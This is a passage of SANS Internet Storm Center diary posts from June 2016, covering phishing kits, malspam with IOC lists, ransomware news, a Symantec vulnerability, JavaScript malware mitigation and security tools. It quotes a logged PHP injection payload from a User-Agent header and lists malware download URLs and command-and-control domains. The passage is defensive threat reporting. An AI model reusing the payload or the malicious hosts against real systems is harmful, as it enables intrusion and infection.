Published: 2016-06-29

Critical Symantec Endpoint Protection Vulnerability

Google's "Project Zero" released details about a number of critical vulnerabilities in Symantec's Endpoint Protection prodoct [1]. The vulnerabilities allow for arbitrary code execution on systems with this product installed. Other Symantec products are affected as well , since the vulnerabilities affect the core scanning engine in Symantec Endpoint Protection.

Symantec has released updates, and given the details released by Google you should update as soon as possible. You will need to update the actual Symantec product, which is different from performing a signature update (the signature update happens automatically)

[1] http://googleprojectzero.blogspot.ca/2016/06/how-to-compromise-enterprise-endpoint.html

Johannes B. Ullrich, Ph.D.


Published: 2016-06-29

Phishing Campaign with Blurred Images

For a few days, I’m seeing a lot of phishing emails that try to steal credentials from victims. Well, nothing brand new but, this time, the scenario is quite different : The malicious email contains an HTML body with nice logos and texts pretending to be from a renowned company or service provider. There is a link that opens a page with a fake document but blurred with a popup login page on top of it. The victim is enticed to enter his/her credentials to read the document. I found samples for most of the well-known office documents. Here are some screenshots: The strange fact is that it is not clear which credentials are targeted: Google, Microsoft or corporate accounts? The success of an efficient phishing is to take the victim by the hand and "force" him/her to disclose what we are expecting. So, nothing fancy behind this kind of phishing but it’s always interesting to perform further investigations and, for one of them, it was a good idea. Everybody makes mistakes and attackers too! The phishing page was hosted on a Brazilian website. Usually, such material is hosted on a compromised CMS like, not mentioning names but Wordpress, Joomla or Drupal. The Apache server had the feature 'directory indexing' enabled making all the files publicly available and, amongst the .php and .js files, a zip archive containing the "package" used by the attackers to build the phishing campaign. It was too tempting to have a look at it. The “blurred” effect was implemented in a very easy way: the fake document is a low-resolution screenshot displayed with a higher resolution. Like this: The most interesting finding is the presence of a JavaScript function to validate the victim’s email address but also to check the TLD. Is it a targeted attack? The presence of .mil, .edu or .gov is interesting while .com included all major free email providers.

function emailCheck(emailStr) {
var checkTLD=1;
var knownDomsPat=/^(com|net|org|edu|int|mil|gov|arpa|biz|aero|name|coop|info|pro|museum|ws)$/;
if (checkTLD && domArr[domArr.length-1].length!=2 &&
  domArr[domArr.length-1].search(knownDomsPat)==-1) {
  return false;
errmsg="Please enter a valid email address.";

The HTTP POST data and extra information are sent to the bad guys via a 'mailer.php' script. Sent data are:

  • GeoIP details based on $REMOTE_ADDR
  • User-Agent
  • FQDN / IP
  • Email / Password

Then, an HTTP redirect is performed to a second page: "phone.html" which mimics a Google authentication page and asks for the user phone number. Here again, POST data are processed via "phone.php" which sends a second email with the victim's phone number. Emails are sent to two addresses (not disclosed here):

  • One @gmail.com account
  • One @inbox.ru account

To conclude on a funny finding: there is a specific PHP script 'imp.php' which creates a copy of the material in a new directory. The directory name is based on a combination of a random number converted in Base64 and hashed. By calling this script in an automated way, it is possible to fill the web server file system with thousands of new directories:

From a technical point of view, it is a low-level attack but I'm pretty sure it still works. Take care!

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant


Published: 2016-06-29

What is your most unusual User-Agent?

When looking at my web logs, I am always out to hunt for anomalies. Today, after seeing some odd and long user agents, I figured it would be fun to look for the longest once that I can find in my logs. First of all: how?

Fist, I am extracting the User Agent string from my web server access log:

cut -f 6 -d'"' access_log > /tmp/useragents 
 (this may look different for you if you use a different log format)

Next, sorting the result by line length:

cat /tmp/useragents | awk '{ print length, $0 }' | sort -n -s | cut -d" " -f2- | uniq

So finally some of the "winners"

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 OWASMIME/4.0500 (...) 
 OWASMIME/4.0500 is repeated many times.  No idea what this is about. A buggy script?
chr(47).\x22main.php\x22,\x22|=|\x5Cx3C\x22.chr(63).\x22php \x5Cx24mujj=\x5Cx24_POST['@123'];if(\x5Cx24mujj!='')

An exploit for an OLD Joomla issue if I remember right? This stuff still works?

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0E; 
.NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0;
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; Microsoft Outlook 15.0.4833; 
Microsoft Outlook 15.0.4833; ms-office; MSOffice 15)

Again. Lots of duplicate content. Do you REALLY have to tell me what version of Outlook you are running? I know you are proud of your tablet...

Oddly enough, no shell shock today. 

What is your longest User-Agent if you search your weblogs?

Johannes B. Ullrich, Ph.D.


Published: 2016-06-27

DDoS Extortion - Almost Universally an Empty Threat

Last year there was an emergence of threats of DDoS against financial websites (that eventually broadened to others) under the DD4BC moniker.  Eventually that morphed into Armada Collective with both stopping around December of 2015 with the arrest of a minor in Central Europe.  Starting in March, threatening emails resumed from Armada Collective threatening massive DDoS attacks if a ransom wasn't paid.  Occasionally they would use booter services to deliver smaller attacks threatening larger ones.  Over at CloudFlare, there is a good write up on the latest round of threats.  The short answer is that these latest threats rarely even include the predecessor attack, there is just someone who is spamming people with a bitcoin wallet and hoping to get paid (and unfortunately they are).  The moral of the story is that the actors behind sending emails demanding ransom or DDoS are rarely to be taken seriously.  Don't pay.

John Bambenek
bambenek \at\ gmail /dot/ com
Fidelis Cybersecurity


Published: 2016-06-26

Bart - a new Ransomware

Phishme is reporting the discovery of a new ransomware which its creators have named Bart. Bart shares several commonalities with the Locky ransomware.  Bart is delivered by the same downloader, RockLoader.  The payment site bares a striking resemblance to the Locky page. 

But Bart also deviates from Locky in other ways.  The ransom is much higher, 3 Bitcoins, approximately $2000.  But probably the most striking difference is that unlike most ransomware variants Bart does not require a command and control to facilitate the encryption and in fact looks like it has no command and control capability.  Bart does not utilize the complex public-private key or symmetric encryption methods that have become common in ransomware.  Instead it stores the encrypted files in password protected zip files, and utilizes a victim id and a tor-based payment website to  facilitate decryption.

Unfortunately, no decrpyter is yet available.

More information on Bart can be found at the Phishme website.

-- Rick Wanner MSISE - rwanner at isc dot sans dot edu - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)


Published: 2016-06-23

An Approach to Vulnerability Management

No need to do anything to make your auditor happy than to purchase the most popular scanning tool
No need to worry, when the scan is over and the report has been produced - you are all done
No need to ever leave your cube and speak directly with your system administrators
No need to ever test the scanner on a non-production network in advance
No need to worry, a clean scan means you are both compliant and secure
No need to ever leave your cube and speak directly with your application developers
No need to ever let anyone know when your scan starts, after all an attacker is not going to do that so why should you
No need to worry, if something becomes unavailable during a scan it is totally not your problem
No need to show good stewardship after the purchase by producing metrics such as the percentage of findings that have been fixed as a percentage of all the findings
No need to seek data that demonstrates your scanner could serve as a platform to improve your security posture
No need to keep your boss informed of your progress, s/he would not understand 
No need to divert any of your time from finding things to fixing things
No need to ever think that your scanning tool is every anything but spot on accurate
No need to hold back, it would be great if you shared your Vulnerability Management “best practices" in our comments section below
Russell Eubanks


Published: 2016-06-22

Security through obscurity never works

In last couple of years, I’ve been increasingly working on penetration testing mobile applications. I must admit: this is fun. Not only it’s a combination of reverse engineering (static analysis) and active packet/request mangling, but mobile applications bring with them a whole arsenal of new attack vectors (I plan to cover these in a series of diaries since I held a presentation about that last week at SANSFIRE – we’ll post the handler presentations on the web site soon too; and I also attended the SEC575: Mobile Device Security and Ethical Hacking course with fantastic Chris Crowley, one of the best SANS instructors for sure).

With Android and iOS being two main mobile platforms today it’s logical that most of the mobile penetration tests are concerned with them as well. Here and there I see Windows mobile, but since even Microsoft is giving hope on this platform it appears that we can safely decide to cover Android and iOS only.

Android being more open, I prefer to do penetration testing on Android applications. Typically, when an organization creates applications for several mobile platforms, they use same server infrastructure (i.e. web services). This is logical – it would not make sense to have multiple server infrastructure that basically performs same activities for all platforms.

My process is to do the test on the Android application and then verify findings on the iOS app – if it uses the same server side infrastructure and if it handles local information correctly (and same as Android).

Does obfuscation help?

On Android, many developers use ProGuard. ProGuard is a Java shrinker, optimizer, obfuscator, and preverifier. It is useful as it makes an APK file as small as possible, however in that process the class, method and variable names get obfuscated so it is much more difficult to analyze such applications. You can see one (a bit extreme) example below:

Obfuscated APK

In most of my engagements, I ask for a build without ProGuard. I guess my success ratio is around 50% - quite often I get the response back which says: This is how our production application looks like, and you, as an attacker, should be able to circumvent those protections, otherwise the application is secure.

After such an answer we go through the long cycle of explanation why obscurity is not security: why ProGuard adds nothing but delays activities a bit. And since penetration testers are almost always limited with time (which is not a problem for an attacker, once the application gets published), it is not in company’s interest to waste a penetration tester’s time on deobfuscation. Sure, this should be noted as maybe an additional control (albeit weak).

While the screenshot above looks very difficult to analyze, even jadx, my favorite decompilation tool available at https://github.com/skylot/jadx can deobfuscate it a bit so it’s easier to work on such an app – just selecting Tools -> Deobfuscation, we get the following listing, which is much easier to read. Import this into your favorite IDE and off you go:

Easier to read APK with jadx

If you perform penetration testing, how do you deal with obfuscation? Let us know!

Bojan (https://twitter.com/bojanz)


Published: 2016-06-21

LogMeIn Captain! A "Not so Phishy" Phishing Campaign

Today's story is on another (sort of) phishing campaign - the twist on this one is that the targets are .. us, again, sort of.  This one caught my eye because I've never had a logmein account - no reflection on the product, I've just always had licenses on other comparable products.

The email discusses a real situation, where a breach at one site can result in those credentials being used on a different site, because of the wide practice of folks using "the same password for everything".

The note then continues on with two "click here" links, which point to the two different websites, neither of which is "logmein.com".  

The blog entry in the email points blog.logmeininc.com is different than the blog on logmein's home page, which is at blog.logmein.com.  And accounts.logme.in is a domain that truly looks like it was set up to steal credentials.

The use of "lookalike sites" like this, where the dns name is "close but no cigar" and the content is scraped from the real site is a very widespread and successful approach - if a person is faked into clicking the first link, they almost always continue on by giving up their password or installing the malware that's hosted on the site.  This password change form looks precisely like that.

The truly ironic links in this note is that the one to the Privacy Policy and the "here's a logmein blog that explains why you should never click on links in random emails" - both of these point to logmein.com links that look "for real"

The final verdict?  This note is absolutely legitimate, they really are asking folks to reset their passwords. Unfortunately, the way the note is constructed it should be setting off alarm bells for anyone in the security business.  

This really is too bad, because the message is a good one - as Worf (STNG reference) is fond of saying, "it's always a good day to change your password"!

Rob VandenBrink


Published: 2016-06-20

Ongoing Spam Campaign Related to Swift

Some of our readers reported spam messages related to the recent Swift case. With all the buzz around this story, it looks legitimate to see more and more attackers using this scenario to entice victims to open malicious files. The mail subject is "Swift Payment Notice, pls check" and contains an image of a receipt embedded in an HTML page:

The HTML link point to a malicious PE file called "SWIFT COPY.exe" (MD5: 6ccabab506ad6a8f13c6d84b955c3037). The file is downloaded from a compromized Wordpress instance and seems to contain a keylogger. Data are sent to onyeoma5050s.ddns.net. The host resolved to but it is not valid anymore (take down already completed?)

Even if PE files should be blocked by most web proxies, the current VT score remains low (6/55) which still makes it dangerous. 

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant


Published: 2016-06-20

Using Your Password Manager to Monitor Data Leaks

I wrote this diary while waiting for my flight back to home. Last week, SANSFIRE was held in Washington where I met some ISC handlers. I did not pay too much attention to the security news but I faced an interesting story. Recently, a data leak affected LinkedIn and a friend of mine had a chance to have access to the data (o.a. decrypted passwords). He contacted my and suggested to change my password as soon as possible (as a proof, he sent my password). It was indeed a “valid” one but not my “current” one. More precisely, it was the very first password that I used when a created my LinkedIn account (a long time ago). Interesting… It means that the leaked is not recent.
Passwords are a sensitive topic:  don’t play with fire and follow this golden rule: Change them often and don’t re-use them. The “leak” which affected TeamViewer is a good example. I put leak between quotes because it appeared that some of their users were compromised due to password re-use as they stated. To track and analyze this, password managers and dormant accounts can be very useful to track data leaks.
Usually, when I receive an invitation to create an account on a website, I accept it and create a unique email account that will NEVER be used somewhere else. I'm using something like: "website-url (at) unused (dot) rootshell (dot) be" or “login_webshop.com". This helps me to track:
  • Spammers:  I can “learn” which site leaked (or sold?) my details to spammers.
  • Data leaks: By crawling paste websites for my dormant email addresses or logins.
Another interesting feature of some password managers (well, the one I’m using includes it), they keep a history of the previous passwords and time stamps (when they have been changed):
Based on this information, I’m able to estimate when the data leak really occurred and if it is really coming from the supposed victim or from another source.  This is a new proof that password managers are mandatory for everybody: they protect you and they contain useful data to analyze security incidents. Stay safe!
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant


Published: 2016-06-18

Controlling JavaScript Malware Before it Runs

We've posted a number of stories lately about various exploit kits and the malware they post.  What I'm seeing lately is a bit of an uptick in the use of Javascript by these exploit kits.

Why might this be, you ask?  Isn't Javascript contained and hopefully secured within the browser sandbox?  Aren't we protected by the combined security smarts of Microsoft, Mozilla and Google, right?  We-e-e-e-l, the short answer is NO.  If the Javascript arrives in an inbound email, and one of your windows based users clicks it, it doesn't execute in the browser, it executes inside of the windows shell (the same shell used by cscript.exe or wscript.exe)!  So as Brad Duncan (another of the ISC Handlers) pointed out, this isn't really a Javascript *exploit*, it's Javascript as nature intended it to be (Brad knows way more about malware than I ever will).

We can see this in the registry at:
and you'll find "jsfile" as a key
     computer\hkey_classes_root\.js = jsfile
     computer\hkey_classes_root\jsfile = wshext.dll

Or, when you check the file extension in explorer, Shazam!, it's Windows Script Host!

Not only that, cscript.exe is meant as an admin tool, so all of the Javascript protections that we take for granted in our browser are ABSOLUTELY NOT in play.  All kinds of new (or rather old) features that aren't allowed in the browser now work again.  For instance, javascript executed in cscript can create a tcp client or a tcp server.    Like perhaps to pull malware, maybe crypto-malware down, then install it.  Or to create a basic tcp backdoor or a reverse-shell backdoor.

Worse yet, when you receive a JS file in an email, you'll see an icon that makes it look like it's a text or document file of some kind.  On top of all of that, what we're seeing as a common SPAM practice that makes this more confusing for the folks reading their mail is a "double extension" approach - so these are arriving as "corporate layoffs.doc.js", "bonus Q2.xls.js" or "ups shipping notice.pdf.js" - when this shows up in your mail client, by default Windows (not so helpfully) won't display the "known file extension"  of js, so your folks will see these as docs, excel sheets or pdf files.

So how can we as system administrators protect our users?  Out of the gate we should strip out attachments of type .JS in emails at the SPAM gateway - there's no good reason to be emailing javascript files in and out of the organization (in almost all cases)

In the spirit of "defense in depth" though, let's assume that one of our trusted business partners (who might be whitelisted in the spam filter) or one of our internal users (internal mail doesn't typically go through the spam filter) is already compromised. How do we protect our users in those scenarios?  Let's re-associated .JS file with something that won't actually execute the file - how about notepad?

To do this for a single workstation, right-click on a .js file, and open it with notepad, be sure to click the "always use the selected program to open this kind of file" radio box when you do that.

For an entire organization, you can force the file association in Group Policy, at Computer Configuration / Preferences / Control Panel Settings / Folder Options, then add "New" / File Type


You can see here that we can change how the file opens, and even change the icon that's being displayed. 

Now when we receive some malicious javascript in our inbox, it'll look very different.  And when your folks click on the file, that advanced persistent malicious "hello.js" file below will display rather than execute.


So if you're walking around the office, you can look for the screen that has 10 or 12 notepad files of code open, and feel good that there's one that didn't get infected!  Or more likely (and sadly), check that machine to see how *else* they found to get infected :-)

Rob VandenBrink


Published: 2016-06-17

Critical Adobe Flash Update. Patch Now

Adobe did not release a patch for Flash on Tuesday, but instead alerted users of an unpatched, and actively exploited, vulnerability (CVE-2016-4171).

Today, Adobe did release a patch that fixes this vulnerability (and others). This is a "PATCH NOW" vulnerability that needs to be addressed as soon as possible.



Johannes B. Ullrich, Ph.D.


Published: 2016-06-15

Warp Speed Ahead, L7 Open Source Packet Generator: Warp17


If you’ve noticed a slow-down in diaries over the past few days, check out this picture on twitter https://twitter.com/tbeazer/status/742509914900271104 from our State of the Internet Panel. That is quite a few of us at SANSFIRE 2016 #SANSFIRE. It is the once a year pilgrimage that some of us take to gather together and take some training. Before going Warp17, it felt important to note that even ‘handlers’ need training. 

So, Lorna? Challenge thrown down, challenge accepted. (Look for a review of SANSFire from the handlers over the next couple of months)smiley 

Now, onto a tool a colleague and friend sent over. The website can be found @ http://warp17.net/ and codebase @ https://github.com/Juniper/warp17. First question I asked was ‘why Warp17’, what’s the cool GEEK reference? Well, this handler was expecting some cool ‘Star Trek’ reference and was met with “Who’s A Rapid Packet generator? [1]” Ahhh… Warp17 cause it goes REALLY FAST…. *where’s the coffee?*

The authors state, with hardware used to achieve, that Warp 17 can push near 40Gigs out an x64 platform. Not only that, it can send out http packets. See Docs regarding their layer 7 aspirations, according to documentation “WARP17 currently supports RAW TCP and HTTP 1.1 application traffic. Even though we are currently working on adding support for more application implementations, external contributions are welcome.[2]”

Fig 1. Basic Logical Setup

First thing I noticed is running this as a virtual machine (VM) on a lab laptop will require some cores. This application is CORE hungry and likely designed to be run on hardware or virtual machines with some serious cores available to it. In my VM, it was given 4GB RAM and 4 Cores. Setting aside the first two cores for CLI and Management and second 2 cores for packet generation. Now, it is highly unlikely *sarcasm* that we will get 40Gb of packets out of two cores from the laptop i7 it is running on, but here we go….

Fig 2. CPU Cores on Laptop i7

The documentation is pretty straight forward, but some math will be involved. The first step in the example was doing some bitwise math to determine core usage. According to the readme figure 3 is the table for the command. After review, it looks like my –c command is 0xF.

Figure 3. Bitmask Table from README

After looking at a blank memory channel output when building my own VM, some discussion with the author ensued and getting memory channels from a VM and from some hardware can have different results. The Warp17 team has built a Star Ship *poor attempt at humor* for us [4] [5]. This began the (not-so)fun adventure of downloading a 1G VM on the #SANSFIRE hotel link.

Further dialog concluded that the –n command ‘can’ be left out on virtual machines safely as memory is dynamically allocated. The –m command will inform the virtual hypervisor how much ram is requested and my start command seems to be:

-c 0xF -m 2048

Now before you go off on an adventure to build your own VM, please take a look at the Warp17 Virtual Machine README https://github.com/Juniper/warp17/blob/dev/common/ovf/README.md and decided carefully if you want to download theirs. The authors have already patched DPDK for you and done some test. At the time of this writing, the author disclosed that 1.1 is in the works and should be released some-time after this diary in the next day or two, and he’s not marketing so it will likely be the next day or two *sarcasm filled humor*.

Following the README, check dpdk in order to find status of the vNICs (see figure 4.) The VM README [6] covers this, in short, we need to bind interfaces to dpdk.. So far it seems that my first vNIC is active, at first glance there are some issues. vNIC0 is for management and CLI, vNIC1 and 2 seem to be inactive. When bringing up your interfaces for use with Warp17 don’t add an L3 IP like some people did *cough* me *cough* (RTFM, the Warp17 authors cover a lot of this). For a full run through on getting dpdk to attach to NIC refer to this readme section (https://github.com/Juniper/warp17/blob/master/README.md#configure-dpdk-ports) [7].

For those that want to just jump straight to QEMU? Read the VM README fully, there are instructions on how to take flight on QEMU quickly [6]. When dpdk is set correctly and you sprinkle magic pixie dust on your VM (*kidding* ‘It’s pretty straight forward if you RTFM’) figure 4 is what you should see.

Figure 4.

Warp Speed Mr. Sulu!


sudo ./warp17/build/warp17 -c f -m 2024-- \

        --tcb-pool-sz 1 \

        --cmd-file /home/<user>/warp17/examples/


Make sure to pay attention to -m and set your page sizes to the memory you have allocated to Warp17, it seems the Warp engines in this ship are VERY hungry. Also, it was noted to pay attention to the tcp-pool-sz, notice in the manual the default was 10 and the developers had a monster hardware platform to work with. My little Fusion VM on my MacBook Pro would probably cry and tap out very fast with a 10, so we set this argument to 1.

Moving on to examples, for those of us that “Just want to fire it up and set Phasers to “blast out packets” the authors have CFG examples in *musical tone* da da DA ‘the examples directory’. Note: Found in the Warp17 directory (where ever you put it) under ./examples.

Bottom line, this application is worth a look as a low cost (code is free), open source, BSD licensed "star ship" designed to generate a ton of packets. The authors are active and ready to collaborate. 

Find them on social media @

Twitter: @warp1_7

Facebook: https://www.facebook.com/warp17stg

Google: https://groups.google.com/forum/#!forum/warp17

GitHub: https://github.com/Juniper/warp17


[1] http://warp17.net

[2] https://github.com/Juniper/warp17

[3] https://github.com/Juniper/warp17/blob/master/README.md#performance-benchmarks

[4] https://github.com/Juniper/warp17/tree/dev/common/ovf

[5] http://warp17.net/downloads/

[6] https://github.com/Juniper/warp17/blob/dev/common/ovf/README.md

[7] https://github.com/Juniper/warp17/blob/master/README.md#configure-dpdk-ports



Published: 2016-06-12

DNS Sinkhole ISO Version 2.0

After 4 years (previous version 1.3 Jun 2012), I'm releasing DNS Sinkhole version 2.0 in 64-bit only that can be used with either Bind or PowerDNS; containing the following changes:

- Updated to Slackware 14.1 with Linux kernel 3.10.17
- Added inetsim in the /opt directory as a limited alternative to collect redirected sinkhole information
- Updated PowerAdmin to version 2.1.7 with DNSSEC support
- Updated pdns to version 3.4.7
- Updated pdns-recursor to version 3.7.3

As per previous versions, you can update the Slackware OS packages with /root/slackupdate.sh shell script. All the custom packages I have created (CD Z directory) will be updated by executing /root/cust64update.sh shell script. I will update and release those as necessary.

I have terminated the maintenance of the 32-bit version but it is still available for download and the patches are still maintained by Slackware.

Version 2.0 is available for direct download here, the MD5 here and the documentation here. The documentation is also on the CD in the rel_note directory. My SANS paper on DNS Sinkhole here.

Happy hunting and host/domain sinking!

[1] http://handlers.sans.org/gbruneau/sinkhole.htm
[2] http://handlers.sans.org/gbruneau/iso/sinkhole/sinkhole64-bit.iso
[3] http://handlers.sans.org/gbruneau/iso/sinkhole/sinkhole64-bit.md5
[4] http://handlers.sans.org/gbruneau/docs/DNS_Sinkhole_setup.pdf
[5] http://www.sans.org/reading-room/whitepapers/dns/dns-sinkhole-33523
[6] https://isc.sans.edu/forums/diary/IPv6+and+DNS+Sinkhole/11542

Guy Bruneau IPSS Inc.
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu


Published: 2016-06-09

Offensive or Defensive Security? Both!

Sometimes students ask me the best way to jump into "the security world". I usually compare information security to medicine: You start with a common base (a strong knowledge in "IT") then you must choose a "specialization": auditor, architect, penetration tester, reverse engineer, incident handler, etc. Basically, those specializations can be grouped in two categories: "offensive" and "defensive". Many people like the first one because it looks more funny and the portrait of the hacker as depicted in Hollywood movies is tough! Being involved in a few call for papers for security conferences, I see a clear trend in submissions focusing on offensive security.

If breaking stuff is always nice (playing the "red team"), being able to defend them against attackers is also very rewarding (playing the "blue team"). So, back to the first student's question: Which side of the force to choose? I can't answer this question for you! It's a very personal choice based on your feelings but one thing is certain. There is clear overlapping between offensive and defensive security. Why? Here are two examples.

First from a defender perspective. To be able to properly defend your assets, you must know what techniques and tools will use the bad guys against you. This is the principle of "Know your enemy!". If you're involved in a security incident, your knowledge of the bad side will be very helpful to find how your server was compromised. If you're implementing a solution or writing some code, try to think as a bad guy and ask yourself "How would I try to break my setup".

On the other side, from an attacker perspective, you can improve your tasks by using defenders' techniques. While performing a pentest, we don't have unlimited time. A good idea is to rely on forensics investigation techniques. Indeed, operating systems like Microsoft Windows are well-known to keep trace of all the user activities in multiple places. It is possible to trace back all the actions performed by a user (which applications he started, the last files opened, network shares mounted, etc). This is a gold mine for a pentester too. Imagine that you just compromised a computer. You've your Meterpreter shell ready. And now? To save your time, just check the latest files opened by the victim, there are chances that they will be business related and contain juicy information. Which internal sites he visited? That's nice targets to pivot! 

So, offensive or defensive security? Choose the one you like but think about both!

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant


Published: 2016-06-09

Searching for malspam


About a week ago, I stopped seeing the daily deluge of malicious spam (malspam) distributing Dridex banking trojans or Locky ransomware.  Before this month, I generally noticed multiple waves of Dridex/Locky malspam almost every day.  This malspam contains attachments with zipped .js files or Microsoft Office documents designed to download and install the malware.

I haven't found much discussion about the current absence of Dridex/Locky malspam.  Since the actor(s) behind Dridex started distributing Locky in back in February 2016 [1], I can't recall any lengthy absence of this malspam.

Shown above:  Have others noticed a lull in Dridex/Locky? [2]

Of course, other campaigns are ongoing, so I figure it's time to review other examples of malspam.  These campaigns are somewhat harder to find than Dridex/Locky malspam, but they're certainly out there.

However, my field of view is limited, and I can only report on what I'm seeing.  With that in mind, this diary reviews two examples of malspam I found on Wednesday 2016-06-08.

First example

Our first example was sent to one of the ISC handlers' email aliases.  This example has a zipped .js file attachment.

Shown above:  Malspam sent to one of the ISC hander distros on 2016-06-08.

Shown above:  Contents of the zip file attachment from the malspam.

Shown above:  The extracted .js file opened in a text editor.

Running the extracted .js file on a Windows host generated plenty of HTTP traffic.

Shown above:  A pcap of the infection traffic filtered in Wireshark.

I saw plenty of artifacts on the infected host, and at least one of the items appears to be Andromeda, based on alerts seen when I played back a pcap of the traffic in Security Onion using Suricata with the ETPRO ruleset.

Shown above:  Alerts generated on the pcap from Sguil in Security Onion.

The Snort subscriber ruleset also generated alerts on the same traffic that triggered Andromeda hits with the ETPRO ruleset.

Some of the alerts after reading the pcap in Snort using the Talos Snort subscriber ruleset.

Second example

Our second example is Brazilian malspam in Portuguese sent to a different email address.  Instead of an attachment, this one has a link to download the malware.

Shown above:  Malspam sent to a recipient using a Brazilian email address.

Shown above:  Translation of the message from Portuguese to English.

The link from the malspam redirected to malware hosted on 4shared.com.

Shown above:  Traffic caused by clicking on the link from the malspam.

Shown above:  Malware downloaded from the malspam link.

Here's what the HTTP traffic looked like from the infected host:

Shown above:  HTTP traffic from the second infection filtered in Wireshark.

In addition to the HTTP traffic, I saw IRC activity on TCP port 443 from the infected host to a server on ssl.houselannister.top at 

Shown above:  My infected host signing in to the IRC channel.

Shown above:  More IRC activity from my infected Windows host.

Of note, the hostname/username for my infected Windows host in this pcap is a throwaway.  Also, the IP address listed in the IRC channel is not the actual IP address of my infected host.

Alerts from this traffic show a Mikey variant, and this infection apparently added my Windows host to a botnet.

Shown above:  Alerts generated on the second infection from Sguil in Security Onion.

Indicators of compromise (IOC) - first example

Domain used for the initial malware download by the .js file:

  • port 80 - www.owifdsferger.net
  • port 80 - www.dorimelds.at
  • port 80 - www.opaosdfdksdfd.ro
  • port 80 - www.brusasport.com

Post infection traffic that triggered alerts for Andromeda malware:

  • port 80 - secure.adnxs.metalsystems.it - POST /new_and/state.php 

Other HTTP traffic during this infection:

  • port 80 - antoniocaroli.it - GET /prova/sd/Lnoort.exe
  • port 80 - www.antoniocaroli.it - GET /prova/sd/Lnoort.exe
  • port 80 - antoniocaroli.it - GET /prova/sd/romeo.exe
  • port 80 - www.antoniocaroli.it - GET /prova/sd/romeo.exe
  • port 80 - www.amicimusica.ud.it - GET /audio/js.mod
  • port 80 - - GET /js/calc.pack
  • port 80 - statcollector.at - GET /statfiles/pz/ft.so
  • port 2352 - Attempted TCP connection to dop.premiocastelloacaja.com
  • port 80 - goyanok.at - HTTP POST triggered alert for Ursnif variant

Indicators of compromise (IOC) - second example

Traffic to retrieve the initial malware:

  • port 80 - www.grupoc4.top - GET /m.php?id=[name] 
  • NOTE: See the pcap for the URL from 4shared.com hosting the initial malware

Post-infection traffic: 

  • port 80 - www.ruthless.sexy - Callback from the infected host
  • port 80 - lol.devyatinskiy.ru - Callback from the infected host 
  • port 80 - api.devyatinskiy.ru - Callback from the infected host
  • port 80 - - GET /fix.dll
  • port 443 - attempted TCP connections to imestre.cheddarmcmelt.top
  • port 443 - IRC traffic to ssl.houselannister.top

Final words

Malspam is a pretty low-level threat, in my opinion.  Most people recognize the malspam and will never click on the attachments or links.  For those more likely to click, software restriction policies can play a role in preventing infections.  And finally, people should be using properly administered Windows hosts and follow best security practices (up-to-date applications, latest OS patches, etc).

The same thing goes for Dridex/Locky malspam, which I expect will return soon enough.

But many vulnerable hosts are still out there, and enough people using those hosts are still tricked by this malspam.  That's probably why malspam remains a profitable method to distribute malware.

Pcaps and malware for this ISC diary can be found here.

Brad Duncan
brad [at] malware-traffic-analysis.net


[1] https://www.proofpoint.com/us/threat-insight/post/Dridex-Actors-Get-In-the-Ransomware-Game-With-Locky
[2] https://twitter.com/MalwareTechBlog/status/738530089600733184


Published: 2016-06-08

Neutrino EK and CryptXXX


By Monday 2016-06-06, the pseudo-Darkleech campaign began using Neutrino exploit kit (EK) to send CryptXXX ransomware [1].  Until then, I'd only seen Angler EK distribute CryptXXX.  However, this is not the first time we've seen campaigns associated with ransomware switch between Angler EK and Neutrino EK [2, 3, 4, 5].  It was documented as early as August 2015 [2].  This can be confusing, especially if you're expecting Angler EK.  Campaigns can (and occasionally do) switch EKs.

For an explanation of EK fundamentals, see this blog post.

On Tuesday 2016-06-07, I found a compromised website with injected script from two different campaigns: pseudo-Darkleech and EITest.  On that day, both campaigns were distributing CryptXXX ransomware.  In today's diary, we examine two examples of Neutrino EK triggered by the same compromised website.  One example starts with pseudo-Darkleech script, and the other starts with EITest script.  Pcaps for today's ISC diary can be found here.

Shown above:  Flow chart for one website compromised by two campaigns.

Of note, I've never seen both infections at the same time.  I've only generated EK traffic from one campaign or the other.  Injected script from the pseudo-Darkleech campaign tends to prevent injected script by other campaigns from running.

Development and spread of CryptXXX

Below is a timeline with documenting the development of CryptXXX and its spread from pseudo-Darkleech to other campaigns.  It's not a complete list of everything about CryptXXX, but it provides a general outline.

  • 2016-04-16, Proofpoint reports the first sightings of CryptXXX ransomware [6]
  • 2016-04-23, ISC diary describes pseudo-Darkleech causing Angler EK/Bedep/CryptXXX infections [7]
  • 2016-04-28, PaloAlto Networks reports "Afraidgate" campaign switched from sending Locky to sending CryptXXX [8]
  • 2016-05-09, Proofpoint issues another report on CryptXXX, now at version 2 [9]
  • 2016-05-24, BleepingComputer reports CryptXXX updated to version 3 [10]
  • 2016-06-01, New decryption instructions indicate version 3 of CryptXXX may actually be named "UltraCrypter" [11, 12]
  • 2016-06-03, Proofpoint posts update about CryptXXX, now at version 3.1 [13]
  • 2016-06-05, EITest campaign noted sending CryptXXX through Angler EK [14]

Proofpoint's most recent entry lists the version history of CryptXXX from 1.001 on April 16th to version 3.100 on May 26th.  It also describes some new tricks CryptXXX has up its sleeve.

Infection traffic from Tuesday 2016-06-07

On Tuesday 2016-06-07, I found a website with injected script for both the pseudo-Darkleech campaign and the EITest campaign.

Shown above:  Script from the EITest campaign near the end of the page.

Shown above:  Start of injected script from the pseudo-Darkleech campaign after the page headers.

I was able to generate traffic for each campaign, but I had to use two separate visits, because the pseudo-Darkleech script prevented the EITest script from generating any EK traffic.

Shown above:  Traffic from pseudo-Darkleech Neutrino EK filtered in Wireshark.

Shown above:  Traffic from EITest Neutrino EK filtered in Wireshark.

The Wireshark filter used in the above two images was: http.request or (!(tcp.port eq 80) and tcp.flags eq 0x0002)

Indicators of compromise (IOCs) from the traffic follow:

